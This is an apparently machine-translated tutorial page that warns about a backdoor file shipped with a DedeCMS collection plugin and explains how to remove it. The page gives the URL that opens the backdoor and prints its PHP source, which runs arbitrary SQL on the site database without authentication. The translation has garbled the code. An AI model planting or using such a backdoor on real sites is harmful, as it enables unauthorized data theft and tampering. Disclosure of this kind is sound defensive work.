Dede Collection Master the official left back door removal method _php Tutorial

Source: Internet
Author: User
Removal of the official backdoor method: After the installation of master collection, please immediately delete the Include directory of the dedesql.query.php file, such as has been installed, it is possible that the file has been renamed to Arc.sqlquery.class.php, found and deleted. This file can be used to query the site database without login verification, and to update, delete, query data and other operations. You can also test for yourself if, as I said, the method:
http://your domain name. com/include/dedesql.query.php.php?dopost=viewinfo
Enter the above URL to open the backdoor interface.
To tell the truth, will deliberately leave the backdoor procedures, the best way is not to use. The back door was discovered, and God knows that there will be more back doors coming out of the next so-called new version. The following gate file code is as follows:
Copy CodeThe code is as follows:
Require_once (DirName (__file__). " /.. /include/common.inc.php ");
if (Emptyempty ($dopost))
{
$dopost = "";
}
if ($dopost = = "Rename")
{
if (rename (' dedesql.query.php ', ' arc.sqlquery.class.php ')) {
echo "Success!" ";
}else{
echo "Failed! ";
}
Exit ();
}
if ($dopost = = "ViewInfo")
{
if (Emptyempty ($tablename))
{
echo "does not specify a table name! ";
}
Else
{
$dsql->setquery ("SHOW CREATE TABLE". $dsql->dbname. ".". $tablename);
$dsql->execute (' Me ');
$row 2 = $dsql->getarray (' Me ', mysql_both);
$ctinfo = $row 2[1];
echo " <xmp>". Trim ($ctinfo)."</xmp> ";
}
Exit ();
}
if ($dopost = = "Index")
{
Require_once (dedeinc. ' /arc.partview.class.php ');
$envs = $_sys_globals = Array ();
$envs [' aid '] = 0;
$PV = new Partview ();
$row = $PV->dsql->getone (' Select * from ' dede_homepageset ');
$templet = Str_replace ("{style}", $cfg _df_style, $row [' Templet ']);
$homeFile = DirName (__file__). ' /'. $row [' position '];
$homeFile = Str_replace ("//", "/", str_replace ("\ \", "/", $homeFile));
$fp = fopen ($homeFile, ' w ') or Die ("Cannot update website home page to: $homeFile location");
Fclose ($FP);
$TPL = $cfg _basedir. $cfg _templets_dir. '/'. $templet;
$PV->settemplet ($TPL);
$PV->savetohtml ($homeFile);
$PV->close ();
echo "Successfully updated homepage!" ";
Exit ();
}
else if ($dopost = = "Query")
{
$sqlquery = Trim (stripslashes ($sqlquery));
if (Eregi ("drop (. *) Table", $sqlquery) | | Eregi ("Drop (. *) database", $sqlquery))
{
echo " statements that delete ' data table ' or ' database ' are not allowed to execute here. ";
Exit ();
}
if (eregi ("^select", $sqlquery))
{
$dsql->setquery ($sqlquery);
$dsql->execute ();
if ($dsql->gettotalrow () <=0)
{
echo "Run sql:{$sqlquery}, no return record!" ";
}
Else
{
echo "Run sql:{$sqlquery}, Total". $dsql->gettotalrow (). " Record, the maximum return 100 bar! ";
}
$j = 0;
while ($row = $dsql->getarray ())
{
$j + +;
if ($j >100)
{
Break
}
echo " ";
echo "Record: $j";
echo " ";
foreach ($row as $k = $v)
{
echo "{$k}:{$v}
\ r \ n ";
}
}
Exit ();
}
if ($querytype ==2)
{
$sqlquery = Str_replace ("\ R", "", $sqlquery);
$sqls = Split ("; [ \t]{0,}\n ", $sqlquery);
$nerrCode = ""; $i = 0;
foreach ($sqls as $q)
{
$q = Trim ($q);
if ($q = = "")
{
Continue
}
$dsql->executenonequery ($q);
$errCode = Trim ($dsql->geterror ());
if ($errCode = = "")
{
$i + +;
}
Else
{
$nerrCode. = "Execute: $q error, Error:". $errCode. "
";
}
}
echo "successfully executed {$i} SQL statements!

";
Echo $nerrCode;
}
Else
{
$dsql->executenonequery ($sqlquery);
$nerrCode = Trim ($dsql->geterror ());
echo "successfully executes 1 SQL statements!"

";
Echo $nerrCode;
}
Exit ();
}
if ($dopost = = "View")
{
; Echo '


<title>SQL command-line tools</title>
















SQL command Runner: Data Backup
| Data Restore









';}
?>

http://www.bkjia.com/PHPjc/322870.html www.bkjia.com true http://www.bkjia.com/PHPjc/322870.html techarticle removal of the official backdoor method: After the installation of the master collection, please immediately delete the Include directory of the dedesql.query.php file, such as has been installed, it is possible that the file has been renamed to arc.sqlquery.cl ...

  • Related Article

    Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.